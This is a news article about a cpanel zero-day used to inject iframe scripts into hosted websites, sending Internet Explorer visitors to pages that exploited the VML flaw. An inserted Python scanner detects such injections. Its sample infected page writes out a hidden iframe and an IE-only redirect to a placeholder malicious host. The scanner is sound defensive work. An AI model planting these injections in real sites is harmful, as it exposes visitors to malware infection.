Attackers are exploiting the zero-day VML vulnerability on Windows-based machines by targeting a separate hole in cpanel, an application that’s popular with web hosting services.
The attack, which lasted from late Thursday to Saturday afternoon, used a zero-day vulnerability in cpanel to access the servers of HostGator, a Florida-based company that hosts about 600,000 domain addresses, and three other hosting companies, according to Brent Oxley, the owner of HostGator. The attackers then planted an iframe script in websites that directed some visitors to malicious addresses that would infect them.
The VML hole, and other zero-day vulnerabilities like it, represent a golden opportunity for criminals by allowing them to install spyware and other malware of their choosing on large numbers of machines. But finding a way to lure victims to sites carrying the infected payload remains a key challenge. Criminals involved in this weekend’s attack solved that problem by using a previously unknown vulnerability in cpanel, the leading software used to manage large numbers of websites, to gain access to hundreds or thousands of servers that dish up web pages.
“That speaks to a significant degree of planning,” says Roger Thompson, CTO of Exploit Prevention Labs. “The significant thing is that it was a mass hack with a zero day that worked.”
Oxley agrees. “The person or group that did this is very intelligent, and obviously knows how to plan a big attack,” he says. “Since this exploit could have worked on anyone running cpanel, it had nothing to do with how secure we were.” The perpetrators of the attack were most likely operating out of China or Russia, Oxley says.
Dave Koston, an operations manager at cpanel, says the company patched the hole within an hour of learning about it. An update has been pushed to the vast majority of servers that use cpanel. He says attackers had to have a valid account with each web host to be able to exploit the vulnerability.
Besides HostGator, three other web hosts, including one that is a larger competitor to HostGator, were attacked, Oxley says.
According to Oxley, the attackers used the cpanel flaw to gain entry to HostGator servers more than a month ago, and then lay quietly in wait until last week.
The iframe script also took pains not to call attention to itself, redirecting only visitors using Internet Explorer, the only browser susceptible to the VML vulnerability.
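The injection described above has two tell-tale parts: a hidden or zero-size iframe pointing at a host the site owner never linked to, and a script that sniffs the browser and redirects only Internet Explorer. The following Python scanner is an added example for hosting operators checking served pages after an incident like this one; it is not code from the article, from HostGator or from cpanel. The sample pages, the placeholder host `malicious-placeholder.invalid` and the `allowed_hosts` allow-list are all constructed for the example.

```python
"""Flag injected iframes and browser-conditional redirects in HTML.

Added example (not from the original article). Scans an HTML document for
the two indicators the article describes: hidden/zero-size iframes to
hosts outside an allow-list, and inline scripts that redirect only when
the visitor's browser identifies itself as Internet Explorer.
"""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline style values that make an element invisible to the visitor.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Script fragments that branch on the visitor's browser.
UA_SNIFF = re.compile(r"navigator\.(?:userAgent|appName)", re.I)
IE_TOKEN = re.compile(r"MSIE|Internet Explorer", re.I)
# Script fragments that navigate away from the page.
REDIRECT = re.compile(
    r"location(?:\.href)?\s*=[^=]|location\.(?:replace|assign)\s*\(", re.I)


class PageCollector(HTMLParser):
    """Collects iframe attributes and the bodies of inline <script> tags."""

    def __init__(self):
        super().__init__()
        self.iframes = []      # one attribute dict per <iframe>
        self.scripts = []      # one string per inline <script>
        self._buf = None       # accumulates data while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        # The parser may deliver script text in several chunks; join them.
        if self._buf is not None:
            self._buf.append(data)


def _is_tiny(value):
    """True for width/height attributes of 0 or 1 pixel."""
    try:
        return int(str(value).strip().rstrip("px")) <= 1
    except ValueError:
        return False


def find_indicators(html, allowed_hosts=()):
    """Return a list of (kind, detail, reasons) for suspicious content."""
    page = PageCollector()
    page.feed(html)
    page.close()
    findings = []
    for attrs in page.iframes:
        src = attrs.get("src", "")
        reasons = []
        if _is_tiny(attrs.get("width")) or _is_tiny(attrs.get("height")):
            reasons.append("zero-size iframe")
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden iframe")
        host = urlparse(src).hostname   # None for relative URLs
        if host and host not in allowed_hosts:
            reasons.append("iframe to unlisted host %s" % host)
        if reasons:
            findings.append(("iframe", src, reasons))
    for body in page.scripts:
        if UA_SNIFF.search(body) and IE_TOKEN.search(body) and REDIRECT.search(body):
            findings.append(("script", body.strip()[:60],
                             ["browser-conditional redirect"]))
    return findings


# Constructed sample pages: a clean one and one carrying the injection.
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://www.example.com/video" width="400" height="300"></iframe>
<script>document.getElementById("greeting").innerText = "hello";</script>
</body></html>"""

INJECTED_PAGE = """<html><body><h1>Welcome</h1>
<script>
if (navigator.userAgent.indexOf("MSIE") != -1) {
  document.location = "http://malicious-placeholder.invalid/x.html";
}
</script>
<iframe src="http://malicious-placeholder.invalid/frame.html" width="0"
        height="0" style="display:none"></iframe>
</body></html>"""


def scan_files(paths, allowed_hosts=()):
    """Scan HTML files on disk; returns {path: findings} for files with hits."""
    hits = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = find_indicators(fh.read(), allowed_hosts)
        if found:
            hits[path] = found
    return hits


if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for path, found in scan_files(targets, ("www.example.com",)).items():
            print(path, found)
    else:
        print("clean:", find_indicators(CLEAN_PAGE, ("www.example.com",)))
        print("injected:", find_indicators(INJECTED_PAGE, ("www.example.com",)))
```

Run with file paths to sweep a document root (`python scan.py /var/www/*/index.html`); the allow-list should contain the hosts a site legitimately frames, so that a third-party host appearing in a hidden frame stands out. The script check deliberately requires all three signals (browser sniffing, an IE token and a navigation) to keep false positives from ordinary feature-detection code low.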
The attack came four days after the discovery of the VML vulnerability, which allows malicious websites to gain complete control of Windows-based machines that access the site using IE.
About 20,000 sites are attempting to exploit the flaw, according to Eric Sites, vice president of Sunbelt Software, the company that first spotted the vulnerability.